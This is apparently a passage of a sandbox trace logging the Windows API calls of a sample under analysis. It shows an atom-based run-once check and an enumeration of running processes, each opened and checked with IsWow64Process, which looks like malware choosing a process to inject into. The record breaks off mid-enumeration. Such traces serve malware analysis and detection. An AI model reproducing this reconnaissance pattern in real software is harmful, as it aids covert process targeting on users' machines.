	[0072.996] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.996] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.996] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.997] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetLastError () returned 0x5
	[0072.998] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.998] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.998] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.998] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.998] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.999] CloseHandle (hObject=0x224) returned 1
	[0072.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.999] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.999] CloseHandle (hObject=0x224) returned 1
	[0072.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.999] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.999] CloseHandle (hObject=0x224) returned 1
	[0072.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e58) returned 0xc0000004
	[0073.038] VirtualAlloc (lpAddress=0x0, dwSize=0x16f58, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f58, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.042] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.042] CloseHandle (hObject=0x224) returned 1
	[0073.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.046] CloseHandle (hObject=0x224) returned 1
	[0073.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a58, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.046] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.046] CloseHandle (hObject=0x224) returned 1
	[0073.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.047] CloseHandle (hObject=0x224) returned 1
	[0073.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.047] CloseHandle (hObject=0x224) returned 1
	[0073.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.047] CloseHandle (hObject=0x224) returned 1
	[0073.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.047] CloseHandle (hObject=0x224) returned 1
	[0073.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.047] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.047] CloseHandle (hObject=0x224) returned 1
	[0073.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.048] CloseHandle (hObject=0x224) returned 1
	[0073.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.048] CloseHandle (hObject=0x224) returned 1
	[0073.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.048] CloseHandle (hObject=0x224) returned 1
	[0073.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.048] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.048] CloseHandle (hObject=0x224) returned 1
	[0073.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.049] CloseHandle (hObject=0x224) returned 1
	[0073.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.049] CloseHandle (hObject=0x224) returned 1
	[0073.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.049] CloseHandle (hObject=0x224) returned 1
	[0073.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e8b0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.049] CloseHandle (hObject=0x224) returned 1
	[0073.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.049] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.049] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.049] CloseHandle (hObject=0x224) returned 1
	[0073.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.050] CloseHandle (hObject=0x224) returned 1
	[0073.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.050] CloseHandle (hObject=0x224) returned 1
	[0073.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
